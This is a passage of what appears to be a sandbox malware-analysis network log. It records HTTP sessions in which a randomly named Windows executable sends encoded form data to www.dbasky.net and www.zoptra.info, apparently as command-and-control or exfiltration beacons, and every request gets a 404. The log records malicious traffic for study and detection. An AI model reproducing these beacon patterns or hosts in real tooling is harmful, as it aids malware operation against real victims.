                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 6e 57 33 36 66 49 67 7a 73 75 6a 47 70 31 2f 53 65 5a 6a 41 70 44 4f 6f 78 33 6a 32 41 32 68 4f 65 62 6d 73 50 4c 44 6e 6a 76 68 45 45 39 4d 73 38 47 42 58 49 77 69 36 59 58 37 49 55 50 43 45 52 73 52 34 35 38 49 6c 70 44 50 73 68 47 48 47 37 4b 64 52 74 6b 7a 4b 74 6d 6b 63 59 4a 61 4a 36 6b 47 51 49 67 68 78 36 46 74 49 33 39 71 50 39 66 4b 66 4a 46 62 54 77 51 52 42 52 53 41 31 31 6b 49 6a 4f 41 65 42 69 53 4c 73 4d 35 44 75 37 56 76 33 6c 4e 49 64 75 53 56 6c 39 32 74 6d 58 76 54 44 6a 4a 68 57 55 56 7a 56 6f 6e 6e 2f 45 36 4d 70 52 4e 2b 47 6c 78 61 4c 72 59 61 38 2b 74 43 2b 51 64 75 59 76 5a 4f 4e 76 71 30 79 50 53 72 41 4d 6f 77 3d
                                                                                                                              Data Ascii: Z0WTZ=nW36fIgzsujGp1/SeZjApDOox3j2A2hOebmsPLDnjvhEE9Ms8GBXIwi6YX7IUPCERsR458IlpDPshGHG7KdRtkzKtmkcYJaJ6kGQIghx6FtI39qP9fKfJFbTwQRBRSA11kIjOAeBiSLsM5Du7Vv3lNIduSVl92tmXvTDjJhWUVzVonn/E6MpRN+GlxaLrYa8+tC+QduYvZONvq0yPSrAMow=
                                                                                                                              Nov 2, 2024 08:13:26.807383060 CET289INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:26 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 146
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              23192.168.2.44936334.92.109.131803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:13:28.403348923 CET10879OUTPOST /qgza/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.dbasky.net
                                                                                                                              Origin: http://www.dbasky.net
                                                                                                                              Referer: http://www.dbasky.net/qgza/
                                                                                                                              Content-Length: 10302
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 6e 57 33 36 66 49 67 7a 73 75 6a 47 70 31 2f 53 65 5a 6a 41 70 44 4f 6f 78 33 6a 32 41 32 68 4f 65 62 6d 73 50 4c 44 6e 6a 76 35 45 46 50 30 73 39 68 56 58 4a 77 69 36 47 48 37 4a 55 50 44 65 52 71 35 47 35 38 55 66 70 42 48 73 7a 33 6e 47 36 37 64 52 69 6b 7a 4b 76 6d 6b 5a 48 35 61 51 36 6b 57 55 49 67 52 78 36 46 74 49 33 37 75 50 2f 4e 75 66 46 6c 62 55 33 51 52 64 56 53 41 4e 31 6e 34 7a 4f 42 71 2f 68 69 72 73 4d 5a 7a 75 35 48 33 33 73 4e 49 66 70 53 55 34 39 32 6f 34 58 72 79 36 6a 4a 6b 39 55 53 62 56 35 68 47 55 51 62 34 7a 53 64 57 34 6e 51 2f 76 75 62 36 42 37 71 32 67 5a 59 79 64 39 73 75 67 72 35 64 2f 4e 69 58 34 66 39 31 57 54 6d 36 46 48 4e 44 4b 48 69 45 76 37 58 55 50 38 6b 30 70 50 61 68 63 31 46 7a 4b 4b 66 36 41 55 65 73 67 2b 72 33 33 35 35 6d 6a 6b 53 71 79 78 2b 53 49 30 55 67 68 42 5a 59 49 66 64 43 7a 56 72 37 74 64 38 67 41 2f 57 70 34 59 76 69 5a 55 43 32 76 48 6f 71 4a 31 65 54 35 6d 6f 75 56 48 6f 37 45 42 72 6c 66 5a 41 42 39 4a 35 69 54 59 58 77 64 [TRUNCATED]
                                                                                                                              Data Ascii: Z0WTZ=nW36fIgzsujGp1/SeZjApDOox3j2A2hOebmsPLDnjv5EFP0s9hVXJwi6GH7JUPDeRq5G58UfpBHsz3nG67dRikzKvmkZH5aQ6kWUIgRx6FtI37uP/NufFlbU3QRdVSAN1n4zOBq/hirsMZzu5H33sNIfpSU492o4Xry6jJk9USbV5hGUQb4zSdW4nQ/vub6B7q2gZYyd9sugr5d/NiX4f91WTm6FHNDKHiEv7XUP8k0pPahc1FzKKf6AUesg+r3355mjkSqyx+SI0UghBZYIfdCzVr7td8gA/Wp4YviZUC2vHoqJ1eT5mouVHo7EBrlfZAB9J5iTYXwd093Aocyo1BKXCr8WpVQ+Lpg/gJ3r4LMl+0nd+xSeY5amZPoK2q+t4Mzp9H5qwSXDVQTI9skr9MFwq0jL/gcyIwTSIvgORU3ZwYvSBdvruTe7JQo308sWtc0KsLBk0HO5uKwDq9da2vEo7hwj/GGREU3OBvfJgcY45lFb04nDpcAKvgqJKCX+BhzlbsOXHVZwCFX+1s3QP01puTGWTLTpULOuqEgiGszPbPeaGaHQU0M5zk++exWJKfZq5i9rBTpsnML9Q+rBiwHI62bZxqhbXQabYs3ZXq0Y9qtL4o4AyyFXcErufJLuhblm45kwP/5JWurKPUarpHVNc6XV+yqzmO/MFSUJGjSz1qNNdXtL2HzzNp9hlEUswqwNBwt+E+rSz+wbJFpC3Z/uUEYoXSI1quAsOHMwDvMVCJ/e1jgUAbMRbYDwnH+u1fFWCW8rsaodH/f6vUL8JygUWRNWY4YaHvS3QwwKemz003G5FXaRHHyQA9wFOlnwUU5bzcrKUtBGDvHhW6NCmNce/fggfryjy9kL/FdQKerrE7SBcLpmw+Makj9YioSVYOvRu9ga+6dt2mGJiGAGS9TUz3ahHz3FrW2pwpxtl/QC4FfceeJs5Lch/ggboul9vluUV7PNTB61wORYwOZJpGV/fV1q8tAJspdb7LBNcEJ05w [TRUNCATED]
                                                                                                                              Nov 2, 2024 08:13:29.369029999 CET289INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:29 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 146
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              24192.168.2.44936434.92.109.131803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:13:30.940154076 CET523OUTGET /qgza/?Z0WTZ=qUfac4sEgcT1lV7He6HHqRuPwSXpeUZhJqCALOrqisMgJsMY6XUJFSDaK0uTR8zfEfRb7N0j/DnowCq79bdHl1fL6DN9OJHq4gCFNVkq5WVy1qGx7uu1RVo=&SJuP9=UPQLWRgHAD_ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.dbasky.net
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Nov 2, 2024 08:13:31.910661936 CET289INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:31 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 146
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              25192.168.2.449365162.0.211.143803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:13:37.150755882 CET780OUTPOST /icpx/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.zoptra.info
                                                                                                                              Origin: http://www.zoptra.info
                                                                                                                              Referer: http://www.zoptra.info/icpx/
                                                                                                                              Content-Length: 202
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 4a 55 73 2f 37 6f 32 37 6e 31 65 39 54 34 77 6a 52 74 73 56 70 6a 2b 49 36 49 76 33 31 58 58 62 39 6c 78 52 55 47 50 4d 2f 5a 37 31 38 62 53 33 36 62 59 4c 76 4c 48 38 65 36 78 4f 33 6a 61 73 42 68 5a 4c 43 49 6a 76 44 77 6b 69 36 56 56 64 52 56 35 2f 59 77 6a 67 32 41 4a 63 79 2b 78 51 4e 6d 43 70 35 79 46 65 6f 38 33 61 6e 30 2f 35 62 46 61 6a 69 31 5a 78 6b 77 2f 38 4a 51 62 6f 68 4b 53 6b 33 5a 6d 31 45 45 5a 4f 46 46 4a 34 74 4e 56 67 4f 6a 4d 51 72 68 76 54 42 4b 4d 34 30 4d 52 74 4d 32 39 48 4d 30 54 42 6e 74 74 78 2b 41 63 49 58 2b 64 51 4f 52 51 66 32 54 4e 50 51 67 3d 3d
                                                                                                                              Data Ascii: Z0WTZ=JUs/7o27n1e9T4wjRtsVpj+I6Iv31XXb9lxRUGPM/Z718bS36bYLvLH8e6xO3jasBhZLCIjvDwki6VVdRV5/Ywjg2AJcy+xQNmCp5yFeo83an0/5bFaji1Zxkw/8JQbohKSk3Zm1EEZOFFJ4tNVgOjMQrhvTBKM40MRtM29HM0TBnttx+AcIX+dQORQf2TNPQg==
                                                                                                                              Nov 2, 2024 08:13:37.820764065 CET533INHTTP/1.1 404 Not Found
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:37 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              26192.168.2.449366162.0.211.143803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:13:39.696094036 CET800OUTPOST /icpx/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.zoptra.info
                                                                                                                              Origin: http://www.zoptra.info
                                                                                                                              Referer: http://www.zoptra.info/icpx/
                                                                                                                              Content-Length: 222
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 4a 55 73 2f 37 6f 32 37 6e 31 65 39 4a 5a 41 6a 58 4f 45 56 6c 54 2b 58 32 6f 76 33 67 6e 58 58 39 6c 74 52 55 48 37 6d 34 72 66 31 38 2f 65 33 37 61 59 4c 6f 4c 48 38 52 61 77 45 71 54 61 7a 42 68 64 44 43 4e 62 76 44 32 49 69 36 58 4e 64 52 6a 78 2b 62 41 6a 6d 2f 67 4a 65 38 65 78 51 4e 6d 43 70 35 79 51 35 6f 34 54 61 6e 48 6e 35 62 6b 61 67 68 31 5a 79 74 51 2f 38 66 67 62 6b 68 4b 54 4a 33 59 36 54 45 47 52 4f 46 41 74 34 75 5a 42 6e 45 6a 4d 53 32 78 75 76 4d 50 74 48 74 76 68 6b 4d 41 39 47 48 48 6a 53 69 72 67 72 76 78 39 66 46 2b 35 6a 54 57 5a 72 37 51 77 47 4c 73 53 63 4a 66 77 70 53 43 61 39 37 78 74 50 58 55 4a 77 64 47 77 3d
                                                                                                                              Data Ascii: Z0WTZ=JUs/7o27n1e9JZAjXOEVlT+X2ov3gnXX9ltRUH7m4rf18/e37aYLoLH8RawEqTazBhdDCNbvD2Ii6XNdRjx+bAjm/gJe8exQNmCp5yQ5o4TanHn5bkagh1ZytQ/8fgbkhKTJ3Y6TEGROFAt4uZBnEjMS2xuvMPtHtvhkMA9GHHjSirgrvx9fF+5jTWZr7QwGLsScJfwpSCa97xtPXUJwdGw=
                                                                                                                              Nov 2, 2024 08:13:40.367548943 CET533INHTTP/1.1 404 Not Found
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:40 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              27192.168.2.449367162.0.211.143803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:13:42.261341095 CET10882OUTPOST /icpx/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.zoptra.info
                                                                                                                              Origin: http://www.zoptra.info
                                                                                                                              Referer: http://www.zoptra.info/icpx/
                                                                                                                              Content-Length: 10302
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 4a 55 73 2f 37 6f 32 37 6e 31 65 39 4a 5a 41 6a 58 4f 45 56 6c 54 2b 58 32 6f 76 33 67 6e 58 58 39 6c 74 52 55 48 37 6d 34 72 58 31 38 71 43 33 36 35 41 4c 70 4c 48 38 50 4b 77 48 71 54 61 2b 42 68 6c 48 43 4e 48 2f 44 7a 55 69 37 32 74 64 58 52 5a 2b 41 51 6a 6d 79 41 4a 54 79 2b 78 2f 4e 6c 36 74 35 79 41 35 6f 34 54 61 6e 42 4c 35 53 56 61 67 73 56 5a 78 6b 77 2f 34 4a 51 61 35 68 4b 4b 38 33 59 2b 6c 46 33 78 4f 45 67 64 34 6f 71 35 6e 43 7a 4d 55 33 78 75 33 4d 50 70 6d 74 76 73 64 4d 41 67 6a 48 41 54 53 6a 74 4a 6d 71 6b 64 66 61 34 6f 6c 49 47 70 64 36 6e 55 6c 4b 65 62 68 48 71 67 68 4f 42 2b 78 38 32 64 48 53 57 5a 61 42 44 61 39 64 4c 70 43 30 63 44 47 4d 58 34 74 70 56 4d 35 59 72 45 74 46 6f 4f 30 6d 56 6b 49 7a 77 62 52 35 54 44 6d 46 73 6c 77 71 57 59 62 69 44 56 52 45 2b 62 45 38 74 4a 43 53 50 66 71 30 4c 6c 6d 6c 6b 57 69 6b 6a 56 6c 5a 6a 50 6b 61 6e 56 4b 38 52 45 46 65 4a 37 45 57 2b 38 47 46 44 45 56 45 44 58 2f 4f 51 43 57 31 75 4f 50 76 6d 4b 36 47 56 58 30 [TRUNCATED]
                                                                                                                              Data Ascii: Z0WTZ=JUs/7o27n1e9JZAjXOEVlT+X2ov3gnXX9ltRUH7m4rX18qC365ALpLH8PKwHqTa+BhlHCNH/DzUi72tdXRZ+AQjmyAJTy+x/Nl6t5yA5o4TanBL5SVagsVZxkw/4JQa5hKK83Y+lF3xOEgd4oq5nCzMU3xu3MPpmtvsdMAgjHATSjtJmqkdfa4olIGpd6nUlKebhHqghOB+x82dHSWZaBDa9dLpC0cDGMX4tpVM5YrEtFoO0mVkIzwbR5TDmFslwqWYbiDVRE+bE8tJCSPfq0LlmlkWikjVlZjPkanVK8REFeJ7EW+8GFDEVEDX/OQCW1uOPvmK6GVX0Bu8A829Ki19Z5MbMbxuQ/H0PWC3EErRyFVxb/HS1vE7O+meCxKTacDjlh8WSVFwOSWgHoU9RJi8GA78D74Gftvl0Co8bjmUWDHW7pw//6BUxngvi/G3uceL/IroHYfSDBWm6wIbEtO90CciPu+PSbWvWhoOYjL3SAgQ5lYgJaYy+p1e2fNyzjWS1POJJgFw16DJpLN9nYEycOr+naSzNicR6ksFqnFSwPliC7HfR8pE/2JIQWUwvMonb7owVYJGHFu70tlkiMpUfyjBAImPMGWfjdccs0Isd5kTrR+ejDBGqoLcVQsaEgevJ8zoBMXgbz0fPYVsjyWKQGzr/sJdcXlT42Niiy5Mn/VlJSgnxzSpgbSkUTR9xdF/faHxnsPbK+eueHBrb7dQkaQ2GLKZ4ITPirQsm9EXW8OoUqHgA7Iotifw4ytvp0kJsfgYOnTwDEyI39J57EeHQ7CgPJAC4QwYaRPNQSZe8AUxjlfeG/h5ORr1N1/Agfm8Fg6yBvdS/plQHnXRc6y404aT1obijYBgB/hoNezDtreLG7xBaIJsAKHNE7+M8DR/eMDDhyVYbKDo1sbGODhAzg7CcfV+tZWcoeBbUdy+oJPe+OCaJ2+0Z3TGkT6PP7tnAHXYmgdTJalaKWB4pW45KcAw2FxQ/GTqVhgma5zet47 [TRUNCATED]
                                                                                                                              Nov 2, 2024 08:13:43.005470991 CET533INHTTP/1.1 404 Not Found
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:42 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              28192.168.2.449368162.0.211.143803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:13:44.864203930 CET524OUTGET /icpx/?Z0WTZ=EWEf4eOOpXzvErl7RdF5qy2I3vzfoFn6qWFMKyXoxLDqmpyGz4laiprjdpsB5hfyQE5UJ9beIy4J0yBeSjcOCjXGgmEr9dkECjGb/w9fv9zko2b6bEiJ13U=&SJuP9=UPQLWRgHAD_ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.zoptra.info
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Nov 2, 2024 08:13:45.535084009 CET548INHTTP/1.1 404 Not Found
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:45 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=utf-8
